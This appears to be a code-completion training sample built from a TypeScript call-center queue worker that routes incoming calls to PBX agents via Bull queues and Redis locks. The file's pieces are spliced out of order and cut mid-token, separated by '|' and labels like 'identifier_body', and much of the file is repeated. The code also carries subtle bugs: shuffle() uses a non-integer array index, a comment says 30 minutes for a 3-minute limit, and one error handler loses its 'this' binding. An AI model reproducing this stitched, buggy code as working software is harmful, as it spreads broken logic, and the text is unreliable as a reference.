// you should have one client for each redis node
// in your cluster
[this.redLockClient],
{
// the expected clock drift; for more details
driftFactor: 0.01, // time in ms
// the max number of times Redlock will attempt to lock a resource before erroring
retryCount: 10,
// the time in ms between attempts
retryDelay: 200, // time in ms
// the max time in ms randomly added to retries
// to improve performance under high contention
// see https://www.awsarchitectureblog.com/2015/03/backoff.html
retryJitter: 200 // time in ms
});
this.redlock.on('clientError', function (err) {
this.logger.error('A redis error has occurred:', err);
})
this.queueTopics = [];
this.queues = []
} catch (ex) {
}
}
/**
*
* @param topic 以租户及队列名称组合的唯一的队列名,如果已经存在,返回
*/
add(tenantId: string, queueNumber: string): Queue {
const qNameTopic = `esl_q_queue::${tenantId}::${queueNumber}`;
if (this.queueTopics.indexOf(qNameTopic) < 0) {
const queue = new BullQueue(qNameTopic, this.queueOptions);
this.queueTopics.push(qNameTopic)
this.queues.push(queue);
this.setCacheBullKey(qNameTopic);
queue
.on('error', function (error) {
// An error occured.
console.log('bullqueue', error)
})
.on('active', function (job, jobPromise) {
// A job has started. You can use `jobPromise.cancel()`` to abort it.
console.log('bullqueue active', job.id, new Date())
})
.on('stalled', function (job) {
// A job has been marked as stalled. This is useful for debugging job
// workers that crash or pause the event loop.
console.log('bullqueue stalled', job.id, new Date())
})
.on('progress', function (job, progress) {
// A job's progress was updated!
console.log('bullqueue progress', job.id, new Date())
})
.on('global:progress', function (jobId, progress) {
console.log(`Job ${jobId} is ${progress * 100}% ready!`);
})
.on('completed', function (job, result) {
// A job successfully completed with a `result`.
console.log('in queueworker bullqueue completed', job.id, result)
})
.on('failed', function (job, err) {
// A job failed with reason `err`!
console.log('bullqueue failed', job.id)
// seneca.act({ role: 'pubsub', path: 'queue_job_fail', data: JSON.stringify({ id:job.id, data:job.data }) }, (err, rsp) => {
// console.log('bullqueue failed pubsub',err,rsp)
// })
})
.on('paused', function () {
// The queue has been paused.
console.log('bullqueue paused')
})
.on('resumed', function (job) {
// The queue has been resumed.
console.log('bullqueue resumed')
})
.on('cleaned', function (jobs, type) {
// Old jobs have been cleaned from the queue. `jobs` is an array of cleaned
// jobs, and `type` is the type of jobs cleaned.
console.log('bullqueue cleaned', type)
});
const queueIndex = this.queueTopics.length - 1;
queue.process((job,done) => {
const MaxDoneTime = 3 * 60 * 1000; // 最多执行30分钟
this.doneInComeCall(job, queueIndex, MaxDoneTime)
.then(res => {
this.logger.debug('doneInComeCall res:', res);
done(null,res);
})
.catch(err => {
this.logger.error('doneInComeCall error:', err);
done(err);
})
});
return queue;
} else {
return this.getQueueByName(qNameTopic);
}
}
getQueueByName(name: string): Queue {
try {
const index = this.queueTopics.indexOf(name);
if (index > -1) {
return this.queues[index];
} else {
return null;
}
}
catch (ex) {
this.logger.error('getQueueByName error:', ex);
}
}
async readyCacheBullQueue() {
try {
const keys: string[] = await this.bullQueueClient.keys('bullQueueCache*');
this.logger.debug('readyCacheBullQueue:', keys.join(','));
for (let i = 0; i < keys.length; i++) {
const key = keys[i] || 'bullQueueCache';
const works = key.split('::');
if (works.length === 4) {
this.add(works[2], works[3]);
}
}
return Promise.resolve();
}
catch (ex) {
this.logger.debug('readyCacheBullQueue error ', ex);
return Promise.reject(ex);
}
}
setCacheBullKey(name) {
this.logger.debug('Cache Bull Key : ', name);
this.bullQueueClient.set(`bullQueueCache::${name}`, 1)
.then()
.catch(err => {
this.logger.error('bullQueue set cache key error:', name);
})
}
/**
* @description
* shuffle算法,类似摸牌
* arr为原数组,cards为乱序结果数组
* random取一个index,取arr中这个元素,放入cards,同时移除arr中这个元素。
* @param originalArray 原始数组
* @return {Array}
*/
shuffle(originalArray: string[]) {
const mixedArray = [];
const copyArray = originalArray.slice(0); // 防止改变原来的参数,数组是引用传递
while (copyArray.length > 0) {
//generate a random index of the original array
const randomIndex = Math.random() * copyArray.length;
//push the random element into the mixed one, at the same time, delete the original element
mixedArray.push(copyArray[randomIndex]);
copyArray.splice(randomIndex, 1);
}
return mixedArray;
}
async randomStrategy({ members, tenantId }) {
try {
const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = members.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
const membersRandom = this.shuffle(unlockedMember);
const member = this.cycleFind({ members: membersRandom, tenantId });
return Promise.resolve(member);
} catch (ex) {
this.logger.error('randomStrategy error:', ex);
return Promise.reject(ex);
}
}
/**
* @description
* 按队列中坐席的顺序从上到下一次查找可用的坐席
* 为什么要按members坐席的顺序来,因为实际应用中,这个顺序通常可以用来代表坐席的等级,一般技能卓越
* 的优秀坐席应该放在前面,以为客户提供最好的服务!
*
*/
async topDownStrategy({ members, tenantId }) {
try {
const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = members.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
const member = this.cycleFind({ members: unlockedMember, tenantId });
return Promise.resolve(member);
}
catch (ex) {
this.logger.error('topDownStrategy error:', ex);
return Promise.reject(ex);
}
}
async cycleFind({ members, tenantId }) {
try {
let finded = null;
for (let i = 0; i < members.length; i++) {
//redis锁定成员
//检查是否可用
const member = `${members[i]}`;
finded = await this.pbxExtensionController.checkAgentCanDail(tenantId, member);
// this.logger.debug('find a member:', finded);
if (finded) break;
}
return Promise.resolve(finded);
}
catch (ex) {
this.logger.error('cycleFind error:', ex);
return Promise.reject(ex);
}
}
async roundRobinStrategy({ members, tenantId, queueNumber }) {
try {
const finds = await this.pbxAgentController.getRoundRobinAgents(tenantId, queueNumber);
let newArray = [];
if (finds && finds.length) {
const agent = finds[0];
if (agent && agent.agentNumber) {
const index = members.indexOf(Number(agent.agentNumber));
if (index > -1) {
const firstArray = members.slice(index + 1);
const lastArray = members.slice(0, index + 1);
newArray = firstArray.concat(lastArray);
}
else {
this.logger.info('AgentNumber Is Not Found In Queue Members!');
newArray = members.slice(0);
}
}
else {
this.logger.info('Agent Is Not Found In pbx_agents!');
newArray = members.slice(0);
}
} else {
newArray = members.slice(0);
}
const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = newArray.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
// this.logger.info('=====roundRobinStrategy newArray=====', members, newArray, unlockedMember);
const member = this.cycleFind({ members: unlockedMember, tenantId });
return Promise.resolve(member);
} catch (ex) {
this.logger.error(ex);
return Promise.reject(ex);
}
}
async getLockedMembers({ tenantId }) {
try {
const regKey = `esl::queue::member::locked::${tenantId}::*`;
const keys = await this.redLockClient.keys(regKey);
const members = [];
keys.forEach(key => {
const items = key.split('::');
members.push(items[items.length - 1])
})
return Promise.resolve(members);
}
catch (ex) {
return Promise.reject(ex);
}
}
async lockMember({ tenantId, member }) {
try {
const key = `esl::queue::member::locked::${tenantId}::${member}`;
//await redisQC.setnx(key, member);
// await redisQC.expire(key, 60);
const ttl = 3 * 1000;
const lock = await this.redlock.lock(key, ttl);
return Promise.resolve(lock);
}
catch (ex) {
return Promise.reject(ex);
}
}
async doneInComeCall(args: Job, queueIndex, timeout2: number) {
try {
const argData = args.data;
const { queue, tenantId, callId, timeout } = argData;
this.logger.info(`doneInComeCall ${tenantId}[${callId}]`);
const { members, queueNumber } = queue;
const eventName = `stopFindAgent::${tenantId}::${callId}`;
this.logger.debug('doneInComeCall', eventName);
let eslSendStop = false;
let maxTimeOut = false;
this.e | millisecond)
})
}
catch (ex) {
return Promise.reject(ex);
}
}
} | ventService.once(eventName, (data) => {
this.logger.info(`ESL Send Stop Job:${data.jobId} ,My Job Is: ${args.id}`);
if (data.jobId === args.id) {
eslSendStop = true;
}
})
const startTime = new Date().getTime();
let isMyTurn = false;
let pubData = null;
if (Array.isArray(members) && members.length > 0) {
while (!eslSendStop && !isMyTurn) {
const activeJobs = await this.queues[queueIndex].getActive();
this.logger.info(`activeJobs:${activeJobs.length}`);
isMyTurn = true;
for (let k = 0; k < activeJobs.length; k++) {
const actJob = activeJobs[k];
const actJobOpts = actJob.opts;
const actJobId = actJob.id;
const { priority, timestamp } = actJobOpts;
console.log(`myJob:[${args.id},${args.opts.priority},${args.opts.timestamp}],compareJob:[${actJobId},${priority},${timestamp}]`);
if (priority < args.opts.priority) {
this.logger.info('=============存在优先级比我高的=============');
isMyTurn = false;
await this.wait(1 * 1000);
break;
}
else if (priority === args.opts.priority && timestamp < args.opts.timestamp) {
this.logger.info('=============和我优先级别一样,但是比我进的早!===========');
isMyTurn = false;
await this.wait(1 * 1000);
break;
}
else {
await this.wait(1 * 1000);
}
}
}
while (!eslSendStop && !maxTimeOut) {
this.logger.info(`Job:[${tenantId} - ${args.id}] Finding A Queue Member IN [${members.join(',')}]!`);
const now = new Date().getTime();
if (now - startTime > timeout) {
this.logger.info(`doneInComeCall Timeout ${timeout}`);
maxTimeOut = true;
break;
}
let data = null;
switch (queue.queue.strategy) {
case 'round-robin':
{
data = await this.roundRobinStrategy({
members,
queueNumber,
tenantId
})
break;
}
case 'top-down':
{
data = await this.topDownStrategy({
members,
tenantId
})
break;
}
default:
{
data = await this.randomStrategy({
members,
tenantId
})
break;
}
}
if (data && data.accountCode) {
await this.lockMember({ tenantId, member: data.accountCode });
this.logger.info(`${tenantId} Find A Waiting Agent : ${data.accountCode}`);
pubData = {
tenantId,
callId,
accountCode: data ? data.accountCode : '',
agentId: data ? data.agentId : '',
phoneLogin: data ? data.phoneLogin : '',
phoneNumber: data ? data.phoneNumber : '',
loginType: data ? data.loginType : ''
}
await this.eventService.pubAReidsEvent('esl::callcontrol::queue::finded::member', JSON.stringify({
success: true,
tenantId,
callId,
data: pubData
}));
break;
}
else {
await this.wait(3 * 1000);
}
}
}
if (eslSendStop || maxTimeOut) {
const errinfo = { success: false, eslSendStop, maxTimeOut };
return Promise.reject(JSON.stringify(errinfo)); //这里只能是字符串
}
else {
return Promise.resolve({ success: true, data: pubData });
}
} catch (ex) {
this.logger.error('doneInComeCall Error:', ex);
return Promise.reject(ex);
}
}
createChildInjector(): void {
this.childInjector = ReflectiveInjector.resolveAndCreate([
TenantController,
PBXExtensionController,
PBXAgentController,
UserEventController,
], this.injector)
}
async wait(millisecond) {
try {
if (millisecond <= 0) {
millisecond = 3 * 1000;
}
await new Promise((resolve, reject) => {
setTimeout(() => {
resolve();
}, | identifier_body |
QueueWorkerService.ts | import { Injectable, Injector, ReflectiveInjector } from 'injection-js';
import BullQueue = require('bull');
import { Queue, Job, QueueOptions } from 'bull';
// import { deepstreamQuarantine } from 'deepstream.io-client-js';
import { LoggerService } from '../service/LogService';
import { ConfigService } from '../service/ConfigService';
import { RedisService } from '../service/RedisService';
import { EventService } from '../service/EventService';
import { TenantController } from '../controllers/tenant';
import { PBXExtensionController } from '../controllers/pbx_extension';
import { PBXAgentController } from '../controllers/pbx_agent';
import { UserEventController } from '../controllers/userEvent';
import { RedisOptions, Redis } from 'ioredis';
import Redlock = require('redlock');
import { Lock } from 'redlock';
@Injectable()
/**
* @description 用bull实现队列排队,以每一个组合的每一个队列为一个排队队列,包括插队等功能
*/
export class QueueWorkerService {
private queueTopics: string[];
private queues: Queue[]; // 此处算法可以改进
private childInjector: Injector;
private queueOptions: QueueOptions;
private redlock: Redlock;
private redLockClient: Redis;
private bullQueueClient: Redis;
private redisService: RedisService;
private eventService: EventService;
private pbxAgentController: PBXAgentController;
private pbxExtensionController: PBXExtensionController;
constructor(private injector: Injector, private logger: LoggerService, private config: ConfigService) {
this.createChildInjector();
this.eventService = this.injector.get(EventService);
this.pbxAgentController = this.childInjector.get(PBXAgentController);
this.pbxExtensionController = this.childInjector.get(PBXExtensionController);
}
async init() {
try {
this.redisService = this.injector.get(RedisService);
this.queueOptions = {
redis: {
host: this.config.getConfig().redis.host,
port: this.config.getConfig().redis.port,
password: this.config.getConfig().redis.password ? this.config.getConfig().redis.password : null,
db: 10,
},
prefix: 'esl_bull'
}
this.redLockClient = this.redisService.getClientByName('RedLock');
this.bullQueueClient = this.redisService.getClientByName('BullQueue');
this.redlock = new Redlock(
// you should have one client for each redis node
// in your cluster
[this.redLockClient],
{
// the expected clock drift; for more details
driftFactor: 0.01, // time in ms
// the max number of times Redlock will attempt to lock a resource before erroring
retryCount: 10,
// the time in ms between attempts
retryDelay: 200, // time in ms
// the max time in ms randomly added to retries
// to improve performance under high contention
// see https://www.awsarchitectureblog.com/2015/03/backoff.html
retryJitter: 200 // time in ms
});
this.redlock.on('clientError', function (err) {
this.logger.error('A redis error has occurred:', err);
})
this.queueTopics = [];
this.queues = []
} catch (ex) {
}
}
/**
*
* @param topic 以租户及队列名称组合的唯一的队列名,如果已经存在,返回
*/
add(tenantId: string, queueNumber: string): Queue {
const qNameTopic = `esl_q_queue::${tenantId}::${queueNumber}`;
if (this.queueTopics.indexOf(qNameTopic) < 0) {
const queue = new BullQueue(qNameTopic, this.queueOptions);
this.queueTopics.push(qNameTopic)
this.queues.push(queue);
this.setCacheBullKey(qNameTopic);
queue
.on('error', function (error) {
// An error occured.
console.log('bullqueue', error)
})
.on('active', function (job, jobPromise) {
// A job has started. You can use `jobPromise.cancel()`` to abort it.
console.log('bullqueue active', job.id, new Date())
})
.on('stalled', function (job) {
// A job has been marked as stalled. This is useful for debugging job
// workers that crash or pause the event loop.
console.log('bullqueue stalled', job.id, new Date())
})
.on('progress', function (job, progress) {
// A job's progress was updated!
console.log('bullqueue progress', job.id, new Date())
})
.on('global:progress', function (jobId, progress) {
console.log(`Job ${jobId} is ${progress * 100}% ready!`);
})
.on('completed', function (job, result) {
// A job successfully completed with a `result`.
console.log('in queueworker bullqueue completed', job.id, result)
})
.on('failed', function (job, err) {
// A job failed with reason `err`!
console.log('bullqueue failed', job.id)
// seneca.act({ role: 'pubsub', path: 'queue_job_fail', data: JSON.stringify({ id:job.id, data:job.data }) }, (err, rsp) => {
// console.log('bullqueue failed pubsub',err,rsp)
// })
})
.on('paused', function () {
// The queue has been paused.
console.log('bullqueue paused')
})
.on('resumed', function (job) {
// The queue has been resumed.
console.log('bullqueue resumed')
})
.on('cleaned', function (jobs, type) {
// Old jobs have been cleaned from the queue. `jobs` is an array of cleaned
// jobs, and `type` is the type of jobs cleaned.
console.log('bullqueue cleaned', type)
});
const queueIndex = this.queueTopics.length - 1;
queue.process((job,done) => {
const MaxDoneTime = 3 * 60 * 1000; // 最多执行30分钟
this.doneInComeCall(job, queueIndex, MaxDoneTime)
.then(res => {
this.logger.debug('doneInComeCall res:', res);
done(null,res);
})
.catch(err => {
this.logger.error('doneInComeCall error:', err);
done(err);
})
});
return queue;
} else {
return this.getQueueByName(qNameTopic);
}
}
getQueueByName(name: string): Queue {
try {
const index = this.queueTopics.indexOf(name);
if (index > -1) {
return this.queues[index];
} else {
return null;
}
}
catch (ex) {
this.logger.error('getQueueByName error:', ex);
}
}
async readyCacheBullQueue() {
try {
const keys: string[] = await this.bullQueueClient.keys('bullQueueCache*');
this.logger.debug('readyCacheBullQueue:', keys.join(','));
for (let i = 0; i < keys.length; i++) {
const key = keys[i] || 'bullQueueCache';
const works = key.split('::');
if (works.length === 4) {
this.add(works[2], works[3]);
}
}
return Promise.resolve();
}
catch (ex) {
this.logger.debug('readyCacheBullQueue error ', ex);
return Promise.reject(ex);
}
}
setCacheBullKey(name) {
this.logger.debug('Cache Bull Key : ', name);
this.bullQueueClient.set(`bullQueueCache::${name}`, 1)
.then()
.catch(err => {
this.logger.error('bullQueue set cache key error:', name);
})
}
/**
* @description
* shuffle算法,类似摸牌
* arr为原数组,cards为乱序结果数组
* random取一个index,取arr中这个元素,放入cards,同时移除arr中这个元素。
* @param originalArray 原始数组
* @return {Array}
*/
shuffle(originalArray: string[]) {
const mixedArray = [];
const copyArray = originalArray.slice(0); // 防止改变原来的参数,数组是引用传递
while (copyArray.length > 0) {
//generate a random index of the original array
const randomIndex = Math.random() * copyArray.length;
//push the random element into the mixed one, at the same time, delete the original element
mixedArray.push(copyArray[randomIndex]);
copyArray.splice(randomIndex, 1);
}
return mixedArray;
}
async randomStrategy({ members, tenantId }) {
try {
const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = members.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
const membersRandom = this.shuffle(unlockedMember);
const member = this.cycleFind({ members: membersRandom, tenantId });
return Promise.resolve(member);
} catch (ex) {
this.logger.error('randomStrategy error:', ex);
return Promise.reject(ex);
}
}
/**
* @description
* 按队列中坐席的顺序从上到下一次查找可用的坐席
* 为什么要按members坐席的顺序来,因为实际应用中,这个顺序通常可以用来代表坐席的等级,一般技能卓越
* 的优秀坐席应该放在前面,以为客户提供最好的服务!
*
*/
async topDownStrategy({ members, tenantId }) {
try {
const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = members.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
const member = this.cycleFind({ members: unlockedMember, tenantId });
return Promise.resolve(member);
}
catch (ex) {
this.logger.error('topDownStrategy error:', ex);
return Promise.reject(ex);
}
}
async cycleFind({ members, tenantId }) {
try {
let finded = null;
for (let i = 0; i < members.length; i++) {
//redis锁定成员
//检查是否可用
const member = `${members[i]}`;
finded = await this.pbxExtensionController.checkAgentCanDail(tenantId, member);
// this.logger.debug('find a member:', finded);
if (finded) break;
}
return Promise.resolve(finded);
}
catch (ex) {
this.logger.error('cycleFind error:', ex);
return Promise.reject(ex);
}
}
async roundRobinStrategy({ members, tenantId, queueNumber }) {
try {
const finds = await this.pbxAgentController.getRoundRobinAgents(tenantId, queueNumber);
let newArray = [];
if (finds && finds.length) {
const agent = finds[0];
if (agent && agent.agentNumber) {
const index = members.indexOf(Number(agent.agentNumber));
if (index > -1) {
const firstArray = members.slice(index + 1);
const lastArray = members.slice(0, index + 1);
newArray = firstArray.concat(lastArray);
}
else {
this.logger.info('AgentNumber Is Not Found In Queue Members!');
newArray = members.slice(0);
}
}
else {
this.logger.info('Agent Is Not Found In pbx_agents!');
newArray = members.slice(0);
}
} else {
newArray = members.slice(0);
}
const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = newArray.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
// this.logger.info('=====roundRobinStrategy newArray=====', members, newArray, unlockedMember);
const member = this.cycleFind({ members: unlockedMember, tenantId });
return Promise.resolve(member);
} catch (ex) {
this.logger.error(ex);
return Promise.reject(ex);
}
}
async getLockedMembers({ tenantId }) {
try {
const regKey = `esl::queue::member::locked::${tenantId}::*`;
const keys = await this.redLockClient.keys(regKey);
const members = [];
keys.forEach(key => {
const items = key.split('::');
members.push(items[items.length - 1])
})
return Promise.resolve(members);
}
catch (ex) {
return Promise.reject(ex);
}
}
async lockMember({ tenantId, member }) {
try {
const key = `esl::queue::member::locked::${tenantId}::${member}`;
//await redisQC.setnx(key, member);
// await redisQC.expire(key, 60);
const ttl = 3 * 1000;
const lock = await this.redlock.lock(key, ttl);
return Promise.resolve(lock);
}
catch (ex) {
return Promise.reject(ex);
}
}
async doneInComeCall(args: Job, queueIndex, timeout2: number) {
try {
const argData = args.data;
const { queue, tenantId, callId, timeout } = argData;
this.logger.info(`doneInComeCall ${tenantId}[${callId}]`);
const { members, queueNumber } = queue;
const eventName = `stopFindAgent::${tenantId}::${callId}`;
this.logger.debug('doneInComeCall', eventName);
let eslSendStop = false;
let maxTimeOut = false;
this.eventService.once(eventName, (data) => {
this.logger.info(`ESL Send Stop Job:${data.jobId} ,My Job Is: ${args.id}`);
if (data.jobId === args.id) {
eslSendStop = true;
}
})
const startTime = new Date().getTime();
let isMyTurn = false;
let pubData = null;
if (Array.isArray(members) && members.length > 0) {
while (!eslSendStop && !isMyTurn) {
const activeJobs = await this.queues[queueIndex].getActive();
this.logger.info(`activeJobs:${activeJobs.length}`);
isMyTurn = true;
for (let k = 0; k < activeJobs.length; k++) {
const actJob = activeJobs[k];
const actJobOpts = actJob.opts;
const actJobId = actJob.id;
const { priority, time | tch (queue.queue.strategy) {
case 'round-robin':
{
data = await this.roundRobinStrategy({
members,
queueNumber,
tenantId
})
break;
}
case 'top-down':
{
data = await this.topDownStrategy({
members,
tenantId
})
break;
}
default:
{
data = await this.randomStrategy({
members,
tenantId
})
break;
}
}
if (data && data.accountCode) {
await this.lockMember({ tenantId, member: data.accountCode });
this.logger.info(`${tenantId} Find A Waiting Agent : ${data.accountCode}`);
pubData = {
tenantId,
callId,
accountCode: data ? data.accountCode : '',
agentId: data ? data.agentId : '',
phoneLogin: data ? data.phoneLogin : '',
phoneNumber: data ? data.phoneNumber : '',
loginType: data ? data.loginType : ''
}
await this.eventService.pubAReidsEvent('esl::callcontrol::queue::finded::member', JSON.stringify({
success: true,
tenantId,
callId,
data: pubData
}));
break;
}
else {
await this.wait(3 * 1000);
}
}
}
if (eslSendStop || maxTimeOut) {
const errinfo = { success: false, eslSendStop, maxTimeOut };
return Promise.reject(JSON.stringify(errinfo)); //这里只能是字符串
}
else {
return Promise.resolve({ success: true, data: pubData });
}
} catch (ex) {
this.logger.error('doneInComeCall Error:', ex);
return Promise.reject(ex);
}
}
createChildInjector(): void {
this.childInjector = ReflectiveInjector.resolveAndCreate([
TenantController,
PBXExtensionController,
PBXAgentController,
UserEventController,
], this.injector)
}
async wait(millisecond) {
try {
if (millisecond <= 0) {
millisecond = 3 * 1000;
}
await new Promise((resolve, reject) => {
setTimeout(() => {
resolve();
}, millisecond)
})
}
catch (ex) {
return Promise.reject(ex);
}
}
} | stamp } = actJobOpts;
console.log(`myJob:[${args.id},${args.opts.priority},${args.opts.timestamp}],compareJob:[${actJobId},${priority},${timestamp}]`);
if (priority < args.opts.priority) {
this.logger.info('=============存在优先级比我高的=============');
isMyTurn = false;
await this.wait(1 * 1000);
break;
}
else if (priority === args.opts.priority && timestamp < args.opts.timestamp) {
this.logger.info('=============和我优先级别一样,但是比我进的早!===========');
isMyTurn = false;
await this.wait(1 * 1000);
break;
}
else {
await this.wait(1 * 1000);
}
}
}
while (!eslSendStop && !maxTimeOut) {
this.logger.info(`Job:[${tenantId} - ${args.id}] Finding A Queue Member IN [${members.join(',')}]!`);
const now = new Date().getTime();
if (now - startTime > timeout) {
this.logger.info(`doneInComeCall Timeout ${timeout}`);
maxTimeOut = true;
break;
}
let data = null;
swi | conditional_block |
QueueWorkerService.ts | import { Injectable, Injector, ReflectiveInjector } from 'injection-js';
import BullQueue = require('bull');
import { Queue, Job, QueueOptions } from 'bull';
// import { deepstreamQuarantine } from 'deepstream.io-client-js';
import { LoggerService } from '../service/LogService';
import { ConfigService } from '../service/ConfigService';
import { RedisService } from '../service/RedisService';
import { EventService } from '../service/EventService';
import { TenantController } from '../controllers/tenant';
import { PBXExtensionController } from '../controllers/pbx_extension';
import { PBXAgentController } from '../controllers/pbx_agent';
import { UserEventController } from '../controllers/userEvent';
import { RedisOptions, Redis } from 'ioredis';
import Redlock = require('redlock');
import { Lock } from 'redlock';
@Injectable()
/**
* @description 用bull实现队列排队,以每一个组合的每一个队列为一个排队队列,包括插队等功能
*/
export class QueueWorkerService {
private queueTopics: string[];
private queues: Queue[]; // 此处算法可以改进
private childInjector: Injector;
private queueOptions: QueueOptions;
private redlock: Redlock;
private redLockClient: Redis;
private bullQueueClient: Redis;
private redisService: RedisService;
private eventService: EventService;
private pbxAgentController: PBXAgentController;
private pbxExtensionController: PBXExtensionController;
constructor(private injector: Injector, private logger: LoggerService, private config: ConfigService) {
this.createChildInjector();
this.eventService = this.injector.get(EventService);
this.pbxAgentController = this.childInjector.get(PBXAgentController);
this.pbxExtensionController = this.childInjector.get(PBXExtensionController);
}
async init() {
try {
this.redisService = this.injector.get(RedisService);
this.queueOptions = {
redis: {
host: this.config.getConfig().redis.host,
port: this.config.getConfig().redis.port,
password: this.config.getConfig().redis.password ? this.config.getConfig().redis.password : null,
db: 10,
},
prefix: 'esl_bull'
}
this.redLockClient = this.redisService.getClientByName('RedLock');
this.bullQueueClient = this.redisService.getClientByName('BullQueue');
this.redlock = new Redlock(
// you should have one client for each redis node
// in your cluster
[this.redLockClient],
{
// the expected clock drift; for more details
driftFactor: 0.01, // time in ms
// the max number of times Redlock will attempt to lock a resource before erroring
retryCount: 10,
// the time in ms between attempts
retryDelay: 200, // time in ms
// the max time in ms randomly added to retries
// to improve performance under high contention
// see https://www.awsarchitectureblog.com/2015/03/backoff.html
retryJitter: 200 // time in ms
});
this.redlock.on('clientError', function (err) {
this.logger.error('A redis error has occurred:', err);
})
this.queueTopics = [];
this.queues = []
} catch (ex) {
}
}
/**
*
* @param topic 以租户及队列名称组合的唯一的队列名,如果已经存在,返回
*/
add(tenantId: string, queueNumber: string): Queue {
const qNameTopic = `esl_q_queue::${tenantId}::${queueNumber}`;
if (this.queueTopics.indexOf(qNameTopic) < 0) {
const queue = new BullQueue(qNameTopic, this.queueOptions);
this.queueTopics.push(qNameTopic)
this.queues.push(queue);
this.setCacheBullKey(qNameTopic);
queue
.on('error', function (error) {
// An error occured.
console.log('bullqueue', error)
})
.on('active', function (job, jobPromise) {
// A job has started. You can use `jobPromise.cancel()`` to abort it.
console.log('bullqueue active', job.id, new Date())
})
.on('stalled', function (job) {
// A job has been marked as stalled. This is useful for debugging job
// workers that crash or pause the event loop.
console.log('bullqueue stalled', job.id, new Date())
})
.on('progress', function (job, progress) {
// A job's progress was updated!
console.log('bullqueue progress', job.id, new Date())
})
.on('global:progress', function (jobId, progress) {
console.log(`Job ${jobId} is ${progress * 100}% ready!`);
})
.on('completed', function (job, result) {
// A job successfully completed with a `result`.
console.log('in queueworker bullqueue completed', job.id, result)
})
.on('failed', function (job, err) {
// A job failed with reason `err`!
console.log('bullqueue failed', job.id)
// seneca.act({ role: 'pubsub', path: 'queue_job_fail', data: JSON.stringify({ id:job.id, data:job.data }) }, (err, rsp) => {
// console.log('bullqueue failed pubsub',err,rsp)
// })
})
.on('paused', function () {
// The queue has been paused.
console.log('bullqueue paused')
})
.on('resumed', function (job) {
// The queue has been resumed.
console.log('bullqueue resumed')
})
.on('cleaned', function (jobs, type) {
// Old jobs have been cleaned from the queue. `jobs` is an array of cleaned
// jobs, and `type` is the type of jobs cleaned.
console.log('bullqueue cleaned', type)
});
const queueIndex = this.queueTopics.length - 1;
queue.process((job,done) => {
const MaxDoneTime = 3 * 60 * 1000; // 最多执行30分钟
this.doneInComeCall(job, queueIndex, MaxDoneTime)
.then(res => {
this.logger.debug('doneInComeCall res:', res);
done(null,res);
})
.catch(err => {
this.logger.error('doneInComeCall error:', err);
done(err);
})
});
return queue;
} else {
return this.getQueueByName(qNameTopic);
}
}
getQueueByName(name: string): Queue {
try {
const index = this.queueTopics.indexOf(name);
if (index > -1) {
return this.queues[index];
} else {
return null;
}
}
catch (ex) {
this.logger.error('getQueueByName error:', ex);
}
}
async readyCacheBullQueue() {
try {
const keys: string[] = await this.bullQueueClient.keys('bullQueueCache*');
this.logger.debug('readyCacheBullQueue:', keys.join(','));
for (let i = 0; i < keys.length; i++) {
const key = keys[i] || 'bullQueueCache';
const works = key.split('::');
if (works.length === 4) {
this.add(works[2], works[3]);
}
}
return Promise.resolve();
}
catch (ex) {
this.logger.debug('readyCacheBullQueue error ', ex);
return Promise.reject(ex);
}
}
setCacheBullKey(name) {
this.logger.debug('Cache Bull Key : ', name);
this.bullQueueClient.set(`bullQueueCache::${name}`, 1)
.then()
.catch(err => {
this.logger.error('bullQueue set cache key error:', name);
})
}
/**
* @description
* shuffle算法,类似摸牌
* arr为原数组,cards为乱序结果数组
* random取一个index,取arr中这个元素,放入cards,同时移除arr中这个元素。
* @param originalArray 原始数组
* @return {Array}
*/
shuffle(originalArray: string[]) {
const mixedArray = [];
const copyArray = originalArray.slice(0); // 防止改变原来的参数,数组是引用传递
while (copyArray.length > 0) {
//generate a random index of the original array
const randomIndex = Math.random() * copyArray.length;
//push the random element into the mixed one, at the same time, delete the original element
mixedArray.push(copyArray[randomIndex]);
copyArray.splice(randomIndex, 1);
}
return mixedArray;
}
async randomStrategy({ members, tenantId }) {
try {
const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = members.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
const membersRandom = this.shuffle(unlockedMember);
const member = this.cycleFind({ members: membersRandom, tenantId });
return Promise.resolve(member);
} catch (ex) {
this.logger.error('randomStrategy error:', ex);
return Promise.reject(ex);
}
}
/**
* @description
* 按队列中坐席的顺序从上到下一次查找可用的坐席
* 为什么要按members坐席的顺序来,因为实际应用中,这个顺序通常可以用来代表坐席的等级,一般技能卓越
* 的优秀坐席应该放在前面,以为客户提供最好的服务!
*
*/
async topDownStrategy({ members, tenantId }) {
try {
const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = members.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
const member = this.cycleFind({ members: unlockedMember, tenantId });
return Promise.resolve(member);
}
catch (ex) {
this.logger.error('topDownStrategy error:', ex);
return Promise.reject(ex);
}
}
async cycleFind({ members, tenantId }) {
try {
let finded = null;
for (let i = 0; i < members.length; i++) {
//redis锁定成员
//检查是否可用
const member = `${members[i]}`;
finded = await this.pbxExtensionController.checkAgentCanDail(tenantId, member);
// this.logger.debug('find a member:', finded);
if (finded) break;
}
return Promise.resolve(finded);
}
catch (ex) {
this.logger.error('cycleFind error:', ex);
return Promise.reject(ex);
}
}
async roundRobinStrategy({ members, tenantId, queueNumber }) {
try {
const finds = await this.pbxAgentController.getRoundRobinAgents(tenantId, queueNumber);
let newArray = [];
if (finds && finds.length) {
const agent = finds[0];
if (agent && agent.agentNumber) {
const index = members.indexOf(Number(agent.agentNumber));
if (index > -1) {
const firstArray = members.slice(index + 1);
const lastArray = members.slice(0, index + 1);
newArray = firstArray.concat(lastArray);
}
else {
this.logger.info('AgentNumber Is Not Found In Queue Members!');
newArray = members.slice(0);
}
}
else {
this.logger.info('Agent Is Not Found In pbx_agents!');
newArray = members.slice(0);
}
} else {
newArray = members.slice(0);
}
